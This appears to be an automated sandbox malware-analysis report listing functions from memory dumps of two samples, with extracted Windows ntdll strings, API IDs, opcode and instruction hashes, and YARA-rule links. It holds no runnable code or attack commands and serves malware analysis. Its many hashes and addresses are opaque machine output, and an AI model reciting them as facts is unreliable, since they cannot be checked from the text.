                                                      • Opcode Fuzzy Hash: 1792beb5b98b42ff63d31e9e824d210af926f2d5c562059135edca718bedc5f4
                                                      • Instruction Fuzzy Hash: AD90022160184442D14076584C04B4F411997E1202F95C119B815A654DC91589566721
                                                      Function 01623090 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2417102436b5f4f97427c8cfe2520e0f18802ff83947b6f67326697f5802022a
                                                      • Instruction ID: ddfa124eb22936ddc555bffbee4075f3f055ce91d7d7b7ed710aa780feeb9ca7
                                                      • Opcode Fuzzy Hash: 2417102436b5f4f97427c8cfe2520e0f18802ff83947b6f67326697f5802022a
                                                      • Instruction Fuzzy Hash: EE90022164140802D14075588814747001AD7D0601F55C111B4028654EC6168A6677B1
                                                      Function 016239B0 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7b296c17c0f2578fd0cbe0841826ebe982c5c45dd217fbb5b90888ba20c9cb8d
                                                      • Instruction ID: efe09fdd7cafd7f81256dab66ce4962bed382a49aaa1585a856e2a37f641b16e
                                                      • Opcode Fuzzy Hash: 7b296c17c0f2578fd0cbe0841826ebe982c5c45dd217fbb5b90888ba20c9cb8d
                                                      • Instruction Fuzzy Hash: E290022164545102D150755C48046574019B7E0201F55C121B4818694EC55589567321
                                                      Function 01623D70 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 27ebed3cc3c6b7b809a520367706dc48b1a60768ba181899274e3de09cc078a9
                                                      • Instruction ID: 012acfd66690d32797e67ac1c0ba28a6882a05859764ee7102b033e05876f23f
                                                      • Opcode Fuzzy Hash: 27ebed3cc3c6b7b809a520367706dc48b1a60768ba181899274e3de09cc078a9
                                                      • Instruction Fuzzy Hash: 6690023560140402D51075585C04687005A97D0301F55D511B4428658EC65489A2B221
                                                      Function 01623D10 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 811240d8e50a77dab454092a62b8bb06dfe0cbc3e027a3fcc8f9554fa7aac59e
                                                      • Instruction ID: 371701308864b20497b3d9984e89a382189ef63d1f2ec91701451150d00d4faf
                                                      • Opcode Fuzzy Hash: 811240d8e50a77dab454092a62b8bb06dfe0cbc3e027a3fcc8f9554fa7aac59e
                                                      • Instruction Fuzzy Hash: C990023160240142954076585C04A8F411997E1302B95D515B4019654DC91489626321
                                                      Function 01622C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                      • Instruction ID: c7d9afe136069f0c68253de7c04ef4060bfab72a4479e3710ef4d3ba6b94f280
                                                      • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                      • Instruction Fuzzy Hash:
                                                      Function 01622890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID: ___swprintf_l
                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                      • API String ID: 48624451-2108815105
                                                      • Opcode ID: 4492cc3960d0fc8677ae8f6184f7ea7378df4c388c007c5328718bcb9298d4e2
                                                      • Instruction ID: d3c6df49288c10b7ef080d3bc8b1f898abe36b88b8b289dc30a0fa0998e97aaa
                                                      • Opcode Fuzzy Hash: 4492cc3960d0fc8677ae8f6184f7ea7378df4c388c007c5328718bcb9298d4e2
                                                      • Instruction Fuzzy Hash: 0651F7B6B00526BFCB21DB9D8CA097EFBB8BB48240B54826DF465D7641D374DE04CBA0
                                                      Function 01692410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID: ___swprintf_l
                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                      • API String ID: 48624451-2108815105
                                                      • Opcode ID: 324bfc72174669b4f618398fc257dbf04ed79adc03d14d42a2e77332e3665723
                                                      • Instruction ID: 31a1762dbe1b06c98a7039b48fca7285e93d9210d66678904d50acd939e9a3e2
                                                      • Opcode Fuzzy Hash: 324bfc72174669b4f618398fc257dbf04ed79adc03d14d42a2e77332e3665723
                                                      • Instruction Fuzzy Hash: D151E2B5A00646BFCF34DF9DCDA097EBBFDAB44200B04846DE596D7682E774EA408760
                                                      Function 01617630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01654725
                                                      • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01654655
                                                      • CLIENT(ntdll): Processing section info %ws..., xrefs: 01654787
                                                      • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01654742
                                                      • ExecuteOptions, xrefs: 016546A0
                                                      • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 016546FC
                                                      • Execute=1, xrefs: 01654713
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                      • API String ID: 0-484625025
                                                      • Opcode ID: 0b35cf51ed66751b3858ac00014bd42a21666f700ef587026c10f314fddaa48c
                                                      • Instruction ID: 1981ac7a04560acc87b59ce512cf86aee5810d4ad5dd66cb0b8a29404f7ff7ca
                                                      • Opcode Fuzzy Hash: 0b35cf51ed66751b3858ac00014bd42a21666f700ef587026c10f314fddaa48c
                                                      • Instruction Fuzzy Hash: AC512C31A0022ABAEF11AFA9DC95FBD77B9EF14700F0804DDD505AB285EB719A418F54
                                                      Function 016B6940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                      • Instruction ID: 53d8b8ea8d2954b18b677427825aa517fad5de898047d0d60e1ccfa8029c4fb0
                                                      • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                      • Instruction Fuzzy Hash: 64020671508342AFD705DF18C890AAFBBE6EFC8704F04892DF9895B264DB31E985CB56
                                                      Function 0162B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID: __aulldvrm
                                                      • String ID: +$-$0$0
                                                      • API String ID: 1302938615-699404926
                                                      • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                      • Instruction ID: 6aec899807205976fea51f60ccfedd1828bd37497e27a9210f0ec36173eabcd9
                                                      • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                      • Instruction Fuzzy Hash: 3981BD30E05A7A8EEF258E6CCC917FEBBA2EF45320F1C421AD861A7391C77488418F55
                                                      Function 016920E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID: ___swprintf_l
                                                      • String ID: %%%u$[$]:%u
                                                      • API String ID: 48624451-2819853543
                                                      • Opcode ID: 4bc739cc3d428715c6fe8ff09f3c18b15637877a0a3fb72cbec2dee29b44a243
                                                      • Instruction ID: 850ce548ab0379ae3486a62ae79bae9996006ada4e481c24a08448b7e6fb431b
                                                      • Opcode Fuzzy Hash: 4bc739cc3d428715c6fe8ff09f3c18b15637877a0a3fb72cbec2dee29b44a243
                                                      • Instruction Fuzzy Hash: FE2153BAE00119ABDB10DE69DC50AEEBBEDAF54651F05011EEA05D3200E730DA158BA1
                                                      Function 0160F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 016502BD
                                                      • RTL: Re-Waiting, xrefs: 0165031E
                                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 016502E7
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                      • API String ID: 0-2474120054
                                                      • Opcode ID: 4f7d969d0c684a93579e0b324b25c41bc6085806b15bc8bf45adaa494937605c
                                                      • Instruction ID: 4650b342b90fc9f3aacd1e0c130ed75f4cc4985fb85caed5c1b9ccc36abb426b
                                                      • Opcode Fuzzy Hash: 4f7d969d0c684a93579e0b324b25c41bc6085806b15bc8bf45adaa494937605c
                                                      • Instruction Fuzzy Hash: 08E19C306047429FD76ACF28CC84B2ABBE1BB88314F144A9DF9A58B3E1D775D945CB42
                                                      Function 0161BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01657B7F
                                                      • RTL: Re-Waiting, xrefs: 01657BAC
                                                      • RTL: Resource at %p, xrefs: 01657B8E
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                      • API String ID: 0-871070163
                                                      • Opcode ID: dc92c29f63dac70e376734747ee895246a67abc4500725fc45336a4375fc577b
                                                      • Instruction ID: 7d6c840e51d8b1b6926f98332e70207985f275ec8f1220a79196ef67a02a4425
                                                      • Opcode Fuzzy Hash: dc92c29f63dac70e376734747ee895246a67abc4500725fc45336a4375fc577b
                                                      • Instruction Fuzzy Hash: 1841CF317007029FD720DE2ADC40B6AB7E6EF98720F140A1DF95ADB780DB31E8058B95
                                                      Function 0161B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0165728C
                                                      Strings
                                                      • RTL: Re-Waiting, xrefs: 016572C1
                                                      • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01657294
                                                      • RTL: Resource at %p, xrefs: 016572A3
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                      • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                      • API String ID: 885266447-605551621
                                                      • Opcode ID: 990045e8fc2007858826369c62c9d40e5ceda772591cec9477eb3b3b68051e0d
                                                      • Instruction ID: 1a21b25a07baa3c6cb606bfd1d2d8652103922e8079f50893788b179201aa69e
                                                      • Opcode Fuzzy Hash: 990045e8fc2007858826369c62c9d40e5ceda772591cec9477eb3b3b68051e0d
                                                      • Instruction Fuzzy Hash: C341F031640206ABC720CE6ACC41B6AB7B6FB94750F14861DFD55EB340DB21E8028BD5
                                                      Function 01692300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID: ___swprintf_l
                                                      • String ID: %%%u$]:%u
                                                      • API String ID: 48624451-3050659472
                                                      • Opcode ID: ee4fca0b81512d4d02413cdf4fe5582beca3678331662c8bcf650be6c95bc07e
                                                      • Instruction ID: 8c20d781298a55702d6189d7e6398e8628a9ea8c5d713b480d964306167c17a9
                                                      • Opcode Fuzzy Hash: ee4fca0b81512d4d02413cdf4fe5582beca3678331662c8bcf650be6c95bc07e
                                                      • Instruction Fuzzy Hash: 82317172A00619AFDF20DE2DDC50BEEB7BCAB54610F44055EE949E3240EB30AA548BA0
                                                      Function 01627D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID: __aulldvrm
                                                      • String ID: +$-
                                                      • API String ID: 1302938615-2137968064
                                                      • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                      • Instruction ID: 9591bdc3fd59376ccaabae84d226e5aeb8890c306417d7c80c4526755bed63db
                                                      • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                      • Instruction Fuzzy Hash: 5291D271E04A3A9BEB24CF6DCC81EBEBBA5AF64320F14451AE955A73C0D7349941CF21
                                                      Function 015E9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $$@
                                                      • API String ID: 0-1194432280
                                                      • Opcode ID: b68695d2d2c952e58588007038f2b527bd2d9e660bf6e32d8701ee909610707c
                                                      • Instruction ID: bd021465cd7f573d9d5995b0b9acdb933ad9e14a4d88cb204c6f846ce5c35c79
                                                      • Opcode Fuzzy Hash: b68695d2d2c952e58588007038f2b527bd2d9e660bf6e32d8701ee909610707c
                                                      • Instruction Fuzzy Hash: C0811BB1D002699BDB35CB54CC54BEEBBB4BB48754F1041DAEA19B7280D7309E84CFA4
                                                      Function 0166CEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • @_EH4_CallFilterFunc@8.LIBCMT ref: 0166CFBD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID: CallFilterFunc@8
                                                      • String ID: @$@4_w@4_w
                                                      • API String ID: 4062629308-713214301
                                                      • Opcode ID: 546017c3789685b8860d2a26a3e5afef0f7f8ab98e776ee60b10573ca6b39e65
                                                      • Instruction ID: d2412a02ca1abe63d3aeaf2b7f3fda4ba33a1310ef701a7c667a90e58fc584a5
                                                      • Opcode Fuzzy Hash: 546017c3789685b8860d2a26a3e5afef0f7f8ab98e776ee60b10573ca6b39e65
                                                      • Instruction Fuzzy Hash: EB418EB1E0061ADFDB219FA9CD40AAABBB8FF94700F00402EEA45DB354D774D801CB65

                                                      Executed Functions

                                                      Function 02FAC9D1 Relevance: .1, Instructions: 113COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2580938292.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_2d40000_mCFHCvdrqdDiDT.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 56ee9da4001f2d8a14724624146b8c1baf76ee4758a1d2918ede407ceaa83b39
                                                      • Instruction ID: 17bf3a015e178ec4c70bbf2bd028860627e5c4a93ee41fdb2f71f5a1972ba938
                                                      • Opcode Fuzzy Hash: 56ee9da4001f2d8a14724624146b8c1baf76ee4758a1d2918ede407ceaa83b39
                                                      • Instruction Fuzzy Hash: E9318351A593F14ED30E836D08B9675AEC28F5724174EC2EEDADB5F2F3C4888408D3A5
                                                      Function 02FABF46 Relevance: 50.5, Strings: 40, Instructions: 452COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2580938292.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_2d40000_mCFHCvdrqdDiDT.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: J$ p$%'$($*$$*]$,G$,X$4T$:k$<$=$A$I4$In$J$JB$Ma$OC$Q}$Rr$Tl$U$VP$\$_:$_O$d$eL$f$m$n$pH$pw$rp$s$z`$~$9$f
                                                      • API String ID: 0-2424688085
                                                      • Opcode ID: 4e31a98f1a82f70163da6e1ec742c538cee5bf38066226d6d15133b3a308b9ea
                                                      • Instruction ID: f95a6d52dc979042ed6990497efd3148a345e8bcdefb641387157b39e7df82ac
                                                      • Opcode Fuzzy Hash: 4e31a98f1a82f70163da6e1ec742c538cee5bf38066226d6d15133b3a308b9ea
                                                      • Instruction Fuzzy Hash: 884282B0D0522DCBEB24CF04C9A9BDDBBB1BF44748F1081DAC6496B281C7B95A89CF55
                                                      Function 02FB9D59 Relevance: 6.4, Strings: 5, Instructions: 153COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2580938292.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_2d40000_mCFHCvdrqdDiDT.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 6$O$S$\$s
                                                      • API String ID: 0-3854637164
                                                      • Opcode ID: ff54e980c2e53478a6fe11155c7310cf2a1007bd1f627d9341132c03e7bd1afd
                                                      • Instruction ID: da72ad0ee606bc71861610bf4e692f761aa098ea6bc3fbcf65d23f9a91b9e38d
                                                      • Opcode Fuzzy Hash: ff54e980c2e53478a6fe11155c7310cf2a1007bd1f627d9341132c03e7bd1afd
                                                      • Instruction Fuzzy Hash: 8951A0B2D00119AADB11EF95DE49FEEB378EF44754F0041A9EA0C96140E7B05A098FE1
                                                      Function 02FC8419 Relevance: 1.3, Strings: 1, Instructions: 63COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2580938292.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_2d40000_mCFHCvdrqdDiDT.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: #x
                                                      • API String ID: 0-2712575120
                                                      • Opcode ID: 9194081d5ea9ab4a633400af44f94f31eed37167225e2e88b76e793cfad6b0f6
                                                      • Instruction ID: 74235def4d4ac624d4d68c722d14fa87ba3086a4deadffb5e4a623eb4839de74
                                                      • Opcode Fuzzy Hash: 9194081d5ea9ab4a633400af44f94f31eed37167225e2e88b76e793cfad6b0f6
                                                      • Instruction Fuzzy Hash: F3111FB6D0121DAF8B00DFE9D9419EEB7F9EF48310F14816AE919E7200E7749A058FE0
                                                      Function 02FA57DA Relevance: .1, Instructions: 136COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2580938292.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_2d40000_mCFHCvdrqdDiDT.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ee2f0ec23db033cd2a23a213daa9be26b4105500770ef431b1a14de7b887055b
                                                      • Instruction ID: 4f1a099921df873c5478b64402aa1b33224d20bfa323c94f824fe2c28662f6ae
                                                      • Opcode Fuzzy Hash: ee2f0ec23db033cd2a23a213daa9be26b4105500770ef431b1a14de7b887055b
                                                      • Instruction Fuzzy Hash: 85411AB1D11229AFDB14CF99DC81AEEBBB8EF49750F10415AFA18E6240D3B19641CFA4
                                                      Function 02FCA6E9 Relevance: .1, Instructions: 85COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2580938292.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_2d40000_mCFHCvdrqdDiDT.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9c8c02337dbf83409c0976400c58e3364b543278d1427a32fc502a8c4031afd2
                                                      • Instruction ID: efa8a36234af501daff65bd89b87335be2ffa52039b39f04a0bd5ad2398d795a
                                                      • Opcode Fuzzy Hash: 9c8c02337dbf83409c0976400c58e3364b543278d1427a32fc502a8c4031afd2
                                                      • Instruction Fuzzy Hash: 213126B5A00609ABDB14DF99CD41EEFB7B9EF88310F108209FA19A7340D770A911CBA1
                                                      Function 02FCB029 Relevance: .1, Instructions: 77COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2580938292.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_2d40000_mCFHCvdrqdDiDT.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7e0d9b603bca894b1b7f488711c6025884fc6d296e1a85b873df96e97ced468d
                                                      • Instruction ID: b71915a94f092577dd8d7bd6959f070641cd0cab21ed9f519573b575030c89bf
                                                      • Opcode Fuzzy Hash: 7e0d9b603bca894b1b7f488711c6025884fc6d296e1a85b873df96e97ced468d
                                                      • Instruction Fuzzy Hash: 7D2139B5A40309AFDB14DF99DD41EAF77A9EF88710F10450EFA19AB340D770A911CBA1
                                                      Function 02FB9B99 Relevance: .1, Instructions: 75COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2580938292.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_2d40000_mCFHCvdrqdDiDT.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 122a28cb956b161f71204b9ae56e6163ebd02fcf42b2a4769180d5f5d1eb56d4
                                                      • Instruction ID: b8d30dc230f900325d9df91bd1be8f35ba55658d669c3ca58fd672d0b3d0030d
                                                      • Opcode Fuzzy Hash: 122a28cb956b161f71204b9ae56e6163ebd02fcf42b2a4769180d5f5d1eb56d4
                                                      • Instruction Fuzzy Hash: EA1133B23802057AF7209A599C83FAB775D9B84FA4F244019FF04AB2C1D6A5B9124AB5
                                                      Function 02FCA379 Relevance: .1, Instructions: 65COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2580938292.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_2d40000_mCFHCvdrqdDiDT.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4c303ae2e17e6a53e5bdcc3aa8a62c71bd7d2a006122dbbbc3965ba7031c3103
                                                      • Instruction ID: f621feaa9daaf9b0c204e60c0091879afad28067d4d1e3ee04ecb5e7b8f87a57
                                                      • Opcode Fuzzy Hash: 4c303ae2e17e6a53e5bdcc3aa8a62c71bd7d2a006122dbbbc3965ba7031c3103
                                                      • Instruction Fuzzy Hash: 6D118EB1641309ABEB10EB98DD41FBF73ACEB84700F10450EFA096B240D7706901CBA1
                                                      Function 02FC70D9 Relevance: .1, Instructions: 65COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
